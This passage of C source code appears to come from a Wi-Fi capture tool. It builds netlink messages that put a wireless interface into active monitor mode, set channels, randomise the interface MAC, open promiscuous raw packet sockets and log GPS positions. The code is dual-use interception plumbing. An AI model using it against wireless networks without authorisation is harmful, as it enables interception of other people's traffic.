nl_get_supported_iftypes(nla); (ifpresentlist + ii)->type |= IF_HAS_NETLINK; } if(nla->nla_type == NL80211_ATTR_WIPHY_BANDS) nl_get_supported_bands((ifpresentlist + ii), nla); if(nla->nla_type == NL80211_ATTR_FEATURE_FLAGS) { if((*((u32*)nla_data(nla)) & NL80211_FEATURE_ACTIVE_MONITOR) == NL80211_FEATURE_ACTIVE_MONITOR) (ifpresentlist + ii)->type |= IF_HAS_MONITOR_ACTIVE; } nla = nla_next(nla, &nlremlen); } } if(ii < INTERFACELIST_MAX) ii++; } return false; } /*---------------------------------------------------------------------------*/ static inline bool nl_set_frequency(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; i = 0; if(((scanlist + scanlistindex)->frequency) == 0) scanlistindex = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_SET_WIPHY; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_IFINDEX; *(u32*)nla_data(nla) = ifaktindex; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_WIPHY_FREQ; *(u32*)nla_data(nla) = (scanlist + scanlistindex)->frequency; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_CHANNEL_WIDTH; *(u32*)nla_data(nla) = NL80211_CHAN_WIDTH_20_NOHT; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_WIPHY_CHANNEL_TYPE; *(u32*)nla_data(nla) = NL80211_CHAN_NO_HT; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_CENTER_FREQ1; *(u32*)nla_data(nla) = (scanlist + scanlistindex)->frequency; i += 8; if(((scanlist + scanlistindex)->frequency) <= 2484) memcpy(&nltxbuffer[i], legacy241mbdata, LEGACYXXXMB_SIZE); else memcpy(&nltxbuffer[i], legacy56mbdata, LEGACYXXXMB_SIZE); i += LEGACYXXXMB_SIZE; nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } } } return false; } /*---------------------------------------------------------------------------*/ static inline void nl_set_powersave_off(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_SET_INTERFACE; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_IFINDEX; *(u32*)nla_data(nla) = ifaktindex; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_PS_STATE; *(u32*)nla_data(nla) = NL80211_PS_DISABLED; i += 8; nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return; errorcount++; return; } } } return; } /*---------------------------------------------------------------------------*/ static inline bool nl_set_monitormode(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = nlfamily; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = NL80211_CMD_SET_INTERFACE; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_IFINDEX; *(u32*)nla_data(nla) = ifaktindex; i += 8; nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_IFTYPE; *(u32*)nla_data(nla) = NL80211_IFTYPE_MONITOR; i += 8; if(((ifakttype & IFTYPEMONACT) == IFTYPEMONACT) && (activemonitorflag == true)) { nla = (struct nlattr*)(nltxbuffer + i); nla->nla_len = 8; nla->nla_type = NL80211_ATTR_MNTR_FLAGS; nla = (struct nlattr*)nla_data(nla); nla->nla_len = 4; nla->nla_type = NL80211_MNTR_FLAG_ACTIVE; i += 8; } nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } } } return false; } /*===========================================================================*/ /* RTLINK */ static void *rta_data(const struct rtattr *rta) { return (u8*)rta +4; } /*---------------------------------------------------------------------------*/ static bool rt_set_interfacemac(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct ifinfomsg *ifih; static struct rtattr *rta; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); ifih = (struct ifinfomsg*)(nltxbuffer+ i); ifih->ifi_family = 0; ifih->ifi_type = 0; ifih->ifi_index = ifaktindex; ifih->ifi_flags = 0; ifih->ifi_change = 0; i += sizeof(struct ifinfomsg); rta = (struct rtattr*)(nltxbuffer+ i); rta->rta_len = 10; rta->rta_type = IFLA_ADDRESS; memcpy(&nltxbuffer[i + 4], &macclientrg, ETH_ALEN +2); i += 12; nlh->nlmsg_len = i; if((write(fd_socket_rt, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_rt, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return false; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } } } return false; } /*---------------------------------------------------------------------------*/ static bool rt_set_interface(u32 condition) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct ifinfomsg *ifih; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = RTM_NEWLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); ifih = (struct ifinfomsg*)(nltxbuffer+ i); ifih->ifi_family = 0; ifih->ifi_type = 0; ifih->ifi_index = ifaktindex; ifih->ifi_flags = condition; ifih->ifi_change = 1; i += sizeof(struct ifinfomsg); nlh->nlmsg_len = i; if((write(fd_socket_rt, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_rt, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return false; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } } } return false; } /*---------------------------------------------------------------------------*/ static bool rt_get_interfacestatus(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct ifinfomsg *ifih; static struct nlmsgerr *nle; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = RTM_GETLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); ifih = (struct ifinfomsg*)(nltxbuffer+ i); ifih->ifi_family = AF_PACKET; ifih->ifi_type = 0; ifih->ifi_index = ifaktindex; ifih->ifi_flags = 0; ifih->ifi_change = 0; i += sizeof(struct ifinfomsg); nlh->nlmsg_len = i; if((write(fd_socket_rt, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_rt, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return false; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } ifih = (struct ifinfomsg*)NLMSG_DATA(nlh); if((ifih->ifi_flags & IFF_UP) == IFF_UP) ifaktstatus |= IF_STAT_UP; } } return false; } /*---------------------------------------------------------------------------*/ static bool rt_get_interfacelist(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct ifinfomsg *ifih; static struct nlmsgerr *nle; static struct rtattr *rta; static int rtaremlen; static u8 hwmac[ETH_ALEN]; i = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = RTM_GETLINK; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); ifih = (struct ifinfomsg*)(nltxbuffer+ i); ifih->ifi_family = AF_PACKET; ifih->ifi_type = 0; ifih->ifi_index = 0; ifih->ifi_flags = 0; ifih->ifi_change = 0; i += sizeof(struct ifinfomsg); rta = (struct rtattr*)(nltxbuffer+ i); rta->rta_type = IFLA_EXT_MASK; *(u32*)rta_data(rta) = 1; rta->rta_len = 8; i += 8; nlh->nlmsg_len = i; if((write(fd_socket_rt, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_rt, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; return false; } ifih = (struct ifinfomsg*)NLMSG_DATA(nlh); if((ifih->ifi_flags & IFF_UP) == IFF_UP) ifaktstatus |= IF_STAT_UP; rta = (struct rtattr*)(NLMSG_DATA(nlh) + sizeof(struct ifinfomsg)); rtaremlen = NLMSG_PAYLOAD(nlh, 0) - sizeof(struct ifinfomsg); while(RTA_OK(rta, rtaremlen)) { #if(LINUX_VERSION_CODE >= KERNEL_VERSION(5, 10, 0)) if(rta->rta_type == IFLA_PERM_ADDRESS) { if(rta->rta_len == 10) memcpy(hwmac, rta_data(rta), ETH_ALEN); } #else if(rta->rta_type == IFLA_ADDRESS) { if(rta->rta_len == 10) memcpy(hwmac, rta_data(rta), ETH_ALEN); } #endif rta = RTA_NEXT(rta, rtaremlen); } for(i = 0; i < INTERFACELIST_MAX; i++) { if((ifpresentlist + i)->index == ifih->ifi_index) memcpy((ifpresentlist + i)->hwmac, &hwmac, ETH_ALEN); } } } return false; } /*---------------------------------------------------------------------------*/ static bool nl_get_familyid(void) { static ssize_t i; static ssize_t msglen; static struct nlmsghdr *nlh; static struct genlmsghdr *glh; static struct nlattr *nla; static struct nlmsgerr *nle; static int nlremlen = 0; i = 0; nlfamily = 0; nlh = (struct nlmsghdr*)nltxbuffer; nlh->nlmsg_type = GENL_ID_CTRL; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; nlh->nlmsg_seq = nlseqcounter++; nlh->nlmsg_pid = hcxpid; i += sizeof(struct nlmsghdr); glh = (struct genlmsghdr*)(nltxbuffer + i); glh->cmd = CTRL_CMD_GETFAMILY; glh->version = 1; glh->reserved = 0; i += sizeof(struct genlmsghdr); nla = (struct nlattr*)(nltxbuffer + i); nla->nla_type = CTRL_ATTR_FAMILY_NAME; i += sizeof(struct nlattr); memcpy(nltxbuffer +i, NL80211_GENL_NAME, sizeof(NL80211_GENL_NAME)); i += sizeof(NL80211_GENL_NAME); nla->nla_len = sizeof(struct nlattr) + sizeof(NL80211_GENL_NAME); nlh->nlmsg_len = i; if((write(fd_socket_nl, nltxbuffer, i)) != i) return false; while(1) { msglen = read(fd_socket_nl, &nlrxbuffer, NLRX_SIZE); if(msglen == -1) break; if(msglen == 0) break; for(nlh = (struct nlmsghdr*)nlrxbuffer; NLMSG_OK(nlh, (u32)msglen); nlh = NLMSG_NEXT(nlh, msglen)) { if(nlh->nlmsg_type == NLMSG_DONE) return true; if(nlh->nlmsg_type == NLMSG_ERROR) { nle = (struct nlmsgerr*)(nlrxbuffer + sizeof(struct nlmsghdr)); if(nle->error == 0) return true; errorcount++; nlfamily = 0; return false; } glh = (struct genlmsghdr*)NLMSG_DATA(nlh); nla = (struct nlattr*)(NLMSG_DATA(nlh) + sizeof(struct genlmsghdr)); nlremlen = 0; nlremlen = NLMSG_PAYLOAD(nlh, 0) -4; while(nla_ok(nla, nlremlen)) { if(nla->nla_type == CTRL_ATTR_FAMILY_ID) nlfamily = *((u32*)nla_data(nla)); nla = nla_next(nla, &nlremlen); } } } nlfamily = 0; return false; } /*===========================================================================*/ static void usrfrequency_to_scanlist(u16 ufrq) { size_t i; if(ufrq == 0) return; for(i = 0; i < (FREQUENCYLIST_MAX -1); i++) { if((ifaktfrequencylist + i)->status == 0) { if((ifaktfrequencylist + i)->frequency == ufrq) { (scanlist + scanlistindex)->frequency = ufrq; (scanlist + scanlistindex)->channel = frequency_to_channel(ufrq); scanlistindex++; if(scanlistindex >= (FREQUENCYLIST_MAX -1)) return; return; } } } return; } /*---------------------------------------------------------------------------*/ static bool set_interface(bool interfacefrequencyflag, char *userfrequencylistname, char *userchannellistname) { static size_t i; static char *ufld = NULL; static char *tokptr = NULL; static char *userband = NULL; static u16 uband; static u32 ufreq; if(ifaktindex == 0) { for(i = 0; i < ifpresentlistcounter; i++) { if(((ifpresentlist + i)->type & IF_HAS_NLMON) == IF_HAS_NLMON) { ifaktindex = (ifpresentlist + i )->index; ifakttype = (ifpresentlist + i )->type; memcpy(&ifaktname, (ifpresentlist + i )->name, IF_NAMESIZE); memcpy(&ifakthwmac, (ifpresentlist + i )->hwmac, ETH_ALEN); ifaktfrequencylist = (ifpresentlist + i)->frequencylist; break; } } } else { for(i = 0; i < ifpresentlistcounter; i++) { if((ifpresentlist + i )->index == ifaktindex) { if(((ifpresentlist + i)->type & IF_HAS_NLMON) == 0) return false; ifakttype = (ifpresentlist + i )->type; memcpy(&ifakthwmac, (ifpresentlist + i )->hwmac, ETH_ALEN); ifaktfrequencylist = (ifpresentlist + i)->frequencylist; break; } } } if(ifaktfrequencylist == NULL) return false; if(rt_set_interface(0) == false) return false; if(rt_set_interfacemac() == false) return false; if(nl_set_monitormode() == false) return false; if(rt_set_interface(IFF_UP) == false) return false; nl_set_powersave_off(); if(nl_get_interfacestatus() == false) return false; if(rt_get_interfacestatus() == false) return false; scanlistindex = 0; if(interfacefrequencyflag == true) { for(i = 0; i < (FREQUENCYLIST_MAX -1); i++) { if((ifaktfrequencylist + i)->status == 0) { (scanlist + scanlistindex)->frequency = (ifaktfrequencylist + i)->frequency; (scanlist + scanlistindex)->channel = (ifaktfrequencylist + i)->channel; scanlistindex++; if(scanlistindex >= (FREQUENCYLIST_MAX -1)) break; } if((ifaktfrequencylist + i)->frequency == 0) break; } } else if((userfrequencylistname != NULL) || (userchannellistname != NULL)) { if(userfrequencylistname != NULL) { ufld = strdup(userfrequencylistname); tokptr = strtok(ufld, ","); while((tokptr != NULL) && (i < (SCANLIST_MAX - 1))) { usrfrequency_to_scanlist(strtol(tokptr, NULL, 10)); tokptr = strtok(NULL, ","); } free(ufld); } if(userchannellistname != NULL) { ufld = strdup(userchannellistname); tokptr = strtok(ufld, ","); while((tokptr != NULL) && (i < (SCANLIST_MAX - 1))) { uband = strtol(tokptr, &userband, 10); if(userband[0] == 'a') ufreq = channel_to_frequency(uband, NL80211_BAND_2GHZ); else if(userband[0] == 'b') ufreq = channel_to_frequency(uband, NL80211_BAND_5GHZ); else if(userband[0] == 'c') ufreq = channel_to_frequency(uband, NL80211_BAND_6GHZ); else if(userband[0] == 'd') ufreq = channel_to_frequency(uband, NL80211_BAND_60GHZ); #if(LINUX_VERSION_CODE >= KERNEL_VERSION(5, 10, 0)) else if(userband[0] == 'e') ufreq = channel_to_frequency(uband, NL80211_BAND_S1GHZ); #endif usrfrequency_to_scanlist(ufreq); tokptr = strtok(NULL, ","); } free(ufld); } } else { (scanlist + scanlistindex)->frequency = 2412; (scanlist + scanlistindex++)->channel = 1; (scanlist + scanlistindex)->frequency = 2437; (scanlist + scanlistindex++)->channel = 6; (scanlist + scanlistindex)->frequency = 2462; (scanlist + scanlistindex++)->channel = 11; (scanlist + scanlistindex)->frequency = 0; (scanlist + scanlistindex)->channel = 0; } scanlistindex = 0; if(nl_set_frequency() == false) return false; show_interfacecapabilities2(); return true; } /*===========================================================================*/ static bool set_monitormode(void) { if(rt_set_interface(0) == false) return false; if(nl_set_monitormode() == false) return false; if(rt_set_interface(IFF_UP) == false) return false; if(nl_get_interfacestatus() == false) return false; if(rt_get_interfacestatus() == false) return false; show_interfacecapabilities(); fprintf(stdout, "\n\nmonitor mode is active...\n"); return true; } /*===========================================================================*/ static bool get_interfacelist(void) { static size_t i; nl_get_familyid(); if(nlfamily == 0) { errorcount++; return false; } nl_get_regulatorydomain(); if(nl_get_interfacecapabilities() == false) return false; if(nl_get_interfacelist() == false) return false; for(i = 0; i < INTERFACELIST_MAX -1; i++) { if((ifpresentlist + i)->index == 0) break; ifpresentlistcounter++; } if(rt_get_interfacelist() == false) return false; if(ifpresentlistcounter == 0) return false; qsort(ifpresentlist, ifpresentlistcounter, INTERFACELIST_SIZE, sort_interfacelist_by_index); return true; } /*===========================================================================*/ /* RAW PACKET SOCKET */ static bool open_socket_tx(void) { static struct sockaddr_ll saddr; static struct packet_mreq mrq; static int socket_rx_flags; static int prioval; static socklen_t priolen; if((fd_socket_tx = socket(PF_PACKET, SOCK_RAW | SOCK_CLOEXEC, htons(ETH_P_ALL))) < 0) return false; memset(&mrq, 0, sizeof(mrq)); mrq.mr_ifindex = ifaktindex; mrq.mr_type = PACKET_MR_PROMISC; if(setsockopt(fd_socket_tx, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mrq, sizeof(mrq)) < 0) return false; priolen = sizeof(prioval); prioval = 20; if(setsockopt(fd_socket_rx, SOL_SOCKET, SO_PRIORITY, &prioval, priolen) < 0) return false; memset(&saddr, 0, sizeof(saddr)); saddr.sll_family = PF_PACKET; saddr.sll_ifindex = ifaktindex; saddr.sll_protocol = htons(ETH_P_ALL); saddr.sll_halen = ETH_ALEN; saddr.sll_pkttype = PACKET_OTHERHOST; if(bind(fd_socket_tx, (struct sockaddr*) &saddr, sizeof(saddr)) < 0) return false; if((socket_rx_flags = fcntl(fd_socket_rx, F_GETFL, 0)) < 0) return false; if(fcntl(fd_socket_tx, F_SETFL, socket_rx_flags | O_NONBLOCK) < 0) return false; return true; } /*---------------------------------------------------------------------------*/ static bool open_socket_rx(char *bpfname) { size_t c = 10; static struct sockaddr_ll saddr; static struct packet_mreq mrq; static int enable = 1; static int socket_rx_flags; static int prioval; static socklen_t priolen; bpf.len = 0; if(bpfname != NULL) { if(read_bpf(bpfname) == false) { errorcount++; fprintf(stderr, "failed to read BPF\n"); return false; } } if((fd_socket_rx = socket(PF_PACKET, SOCK_RAW | SOCK_CLOEXEC, htons(ETH_P_ALL))) < 0) return false; memset(&mrq, 0, sizeof(mrq)); mrq.mr_ifindex = ifaktindex; mrq.mr_type = PACKET_MR_PROMISC; if(setsockopt(fd_socket_rx, SOL_PACKET, PACKET_ADD_MEMBERSHIP, &mrq, sizeof(mrq)) < 0) return false; priolen = sizeof(prioval); prioval = 20; if(setsockopt(fd_socket_rx, SOL_SOCKET, SO_PRIORITY, &prioval, priolen) < 0) return false; #if(LINUX_VERSION_CODE >= KERNEL_VERSION(4, 20, 0)) if(setsockopt(fd_socket_rx, SOL_PACKET, PACKET_IGNORE_OUTGOING, &enable, sizeof(int)) < 0) return false; #endif if(bpf.len > 0) { if(setsockopt(fd_socket_rx, SOL_SOCKET, SO_ATTACH_FILTER, &bpf, sizeof(bpf)) < 0) return false; } memset(&saddr, 0, sizeof(saddr)); saddr.sll_family = PF_PACKET; saddr.sll_ifindex = ifaktindex; saddr.sll_protocol = htons(ETH_P_ALL); saddr.sll_halen = ETH_ALEN; saddr.sll_pkttype = PACKET_OTHERHOST; if(bind(fd_socket_rx, (struct sockaddr*) &saddr, sizeof(saddr)) < 0) return false; if((socket_rx_flags = fcntl(fd_socket_rx, F_GETFL, 0)) < 0) return false; if(fcntl(fd_socket_rx, F_SETFL, socket_rx_flags | O_NONBLOCK) < 0) return false; while((!wanteventflag) || (c != 0)) { packetlen = read(fd_socket_rx, epb +EPB_SIZE, PCAPNG_SNAPLEN); if(packetlen == -1) break; c--; } return true; } /*===========================================================================*/ /* GPS */ #ifdef NMEAOUT static bool open_nmea0183_file(char *hcxposoutname) { static int c; static struct stat statinfo; static char *hcxposfilename = NULL; static char hcxposname[PATH_MAX]; if(hcxposoutname == NULL) { c = 0; snprintf(hcxposname, PATH_MAX, "%s.nmea", timestring1); while(stat(hcxposname, &statinfo) == 0) { snprintf(hcxposname, PATH_MAX, "%s-%02d.nmea", timestring1, c); c++; } hcxposfilename = hcxposname; } else hcxposfilename = hcxposoutname; if((fd_hcxpos = open(hcxposfilename, O_WRONLY | O_CREAT, 0777)) < 0) return false; return true; } /*---------------------------------------------------------------------------*/ static bool open_socket_gpsd(char *hcxposoutname) { static int socket_gps_flags; static struct sockaddr_in gpsd_addr; static const char *gpsd_enable_nmea = "?WATCH={\"enable\":true,\"json\":false,\"nmea\":true}"; if((fd_gps = socket(AF_INET, SOCK_STREAM, 0)) < 0) return false; memset(&gpsd_addr, 0, sizeof(struct sockaddr_in)); gpsd_addr.sin_family = AF_INET; gpsd_addr.sin_port = htons(2947); gpsd_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); if(connect(fd_gps, (struct sockaddr*) &gpsd_addr, sizeof(gpsd_addr)) < 0) return false; if(fcntl(fd_gps, F_SETFL, socket_gps_flags | O_NONBLOCK) < 0) return false; if(write(fd_gps, gpsd_enable_nmea, 47) != 47) return false; if(open_nmea0183_file(hcxposoutname) == false) return false; return true; } /*---------------------------------------------------------------------------*/ static bool open_device_nmea0183(char *nmea0183name, char *hcxposoutname) { static struct termios tty; if((fd_gps = open(nmea0183name, O_RDONLY | O_NONBLOCK)) < 0) return false; if(flock(fd_gps, LOCK_EX) < 0) return false; if(tcgetattr(fd_gps, &tty) < 0) return false; tty.c_cflag &= ~PARENB; // Clear parity bit, disabling parity (most common) tty.c_cflag &= ~CSTOPB; // Clear stop field, only one stop bit used in communication (most common) tty.c_cflag &= ~CSIZE; // Clear all bits that set the data size tty.c_cflag |= CS8; // 8 bits per byte (most common) tty.c_cflag &= ~CRTSCTS; // Disable RTS/CTS hardware flow control (most common) tty.c_cflag |= CREAD | CLOCAL; // Turn on READ & ignore ctrl lines (CLOCAL = 1) tty.c_lflag &= ~ICANON; tty.c_lflag &= ~ECHO; // Disable echo tty.c_lflag &= ~ECHOE; // Disable erasure tty.c_lflag &= ~ECHONL; // Disable new-line echo tty.c_lflag &= ~ISIG; // Disable interpretation of INTR, QUIT and SUSP tty.c_iflag &= ~(IXON | IXOFF | IXANY); // Turn off s/w flow ctrl tty.c_iflag &= ~(IGNBRK|BRKINT|PARMRK|ISTRIP|INLCR|IGNCR|ICRNL); // Disable any special handling of received bytes tty.c_oflag &= ~OPOST; // Prevent special interpretation of output bytes (e.g. newline chars) tty.c_oflag &= ~ONLCR; // Prevent conversion of newline to carriage return/line feed tty.c_cc[VTIME] = 10; // Wait for up to 1s (10 deciseconds), returning as soon as any data is received. tty.c_cc[VMIN] = 0; cfsetispeed(&tty, B9600); cfsetospeed(&tty, B9600); if (tcsetattr(fd_gps, TCSANOW, &tty) < 0) return false; if(open_nmea0183_file(hcxposoutname) == false) return false; return true; } #endif /*===========================================================================*/ /* CONTROL SOCKETS */ static void close_sockets(void) { if(fd_socket_unix != 0) close(fd_socket_unix); if(fd_socket_rt != 0) close(fd_socket_rt); if(fd_socket_nl != 0) close(fd_socket_nl); if(fd_socket_tx != 0) close(fd_socket_tx); if(bpf.filter != NULL) { if(fd_socket_rx > 0) setsockopt(fd_socket_rx, SOL_SOCKET, SO_DETACH_FILTER, &bpf, sizeof(bpf)); free(bpf.filter); } if(fd_socket_rx != 0) close(fd_socket_rx); return; } /*---------------------------------------------------------------------------*/ static bool open_socket_unix(void) { if((fd_socket_unix = socket(AF_UNIX, SOCK_DGRAM | SOCK_CLOEXEC, 0)) < 0) return false; return true; } /*---------------------------------------------------------------------------*/ static bool open_socket_rt(void) { static struct sockaddr_nl saddr; static int nltxbuffsize = NLTX_SIZE; static int nlrxbuffsize = NLRX_SIZE; if((fd_socket_rt = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_ROUTE)) < 0) return false; if(setsockopt(fd_socket_rt, SOL_SOCKET, SO_SNDBUF, &nltxbuffsize, sizeof(nltxbuffsize)) < 0) return false; if(setsockopt(fd_socket_rt, SOL_SOCKET, SO_RCVBUF, &nlrxbuffsize, sizeof(nlrxbuffsize)) < 0) return false; memset(&saddr, 0, sizeof(saddr)); saddr.nl_family = AF_NETLINK; saddr.nl_pid = getpid(); if(bind(fd_socket_rt, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) return false; return true; } /*---------------------------------------------------------------------------*/ static bool open_socket_nl(void) { static struct sockaddr_nl saddr; static int nltxbuffsize = NLTX_SIZE; static int nlrxbuffsize = NLRX_SIZE; if((fd_socket_nl = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, NETLINK_GENERIC)) < 0) return false; if(setsockopt(fd_socket_nl, SOL_SOCKET, SO_SNDBUF, &nltxbuffsize, sizeof(nltxbuffsize)) < 0) return false; if(setsockopt(fd_socket_nl, SOL_SOCKET, SO_RCVBUF, &nlrxbuffsize, sizeof(nlrxbuffsize)) < 0) return false; if(fcntl(fd_socket_nl, F_SETFL, O_NONBLOCK) < 0) return false; memset(&saddr, 0, sizeof(saddr)); saddr.nl_family = AF_NETLINK; saddr.nl_pid = hcxpid; if(bind(fd_socket_nl, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) return false; return true; } /*===========================================================================*/ static bool open_control_sockets(void) { if(open_socket_rt() == false) return false; if(open_socket_nl() == false) return false; if(open_socket_unix() == false) return false; return true; } /*===========================================================================*/ /* TIMER */ static bool set_timer(void) { static struct itimerspec tval1; if((fd_timer1 = timerfd_create(CLOCK_BOOTTIME, 0)) <0 ) return false; tval1.it_value.tv_sec = TIMER1_VALUE_SEC; tval1.it_value.tv_nsec = TIMER1_VALUE_NSEC; tval1.it_interval.tv_sec = TIMER1_INTERVAL_SEC; tval1.it_interval.tv_nsec = TIMER1_INTERVAL_NSEC; if(timerfd_settime(fd_timer1, 0, &tval1, NULL) == -1) return false; return true; } /*---------------------------------------------------------------------------*/ static bool set_timer_rca(void) { static struct 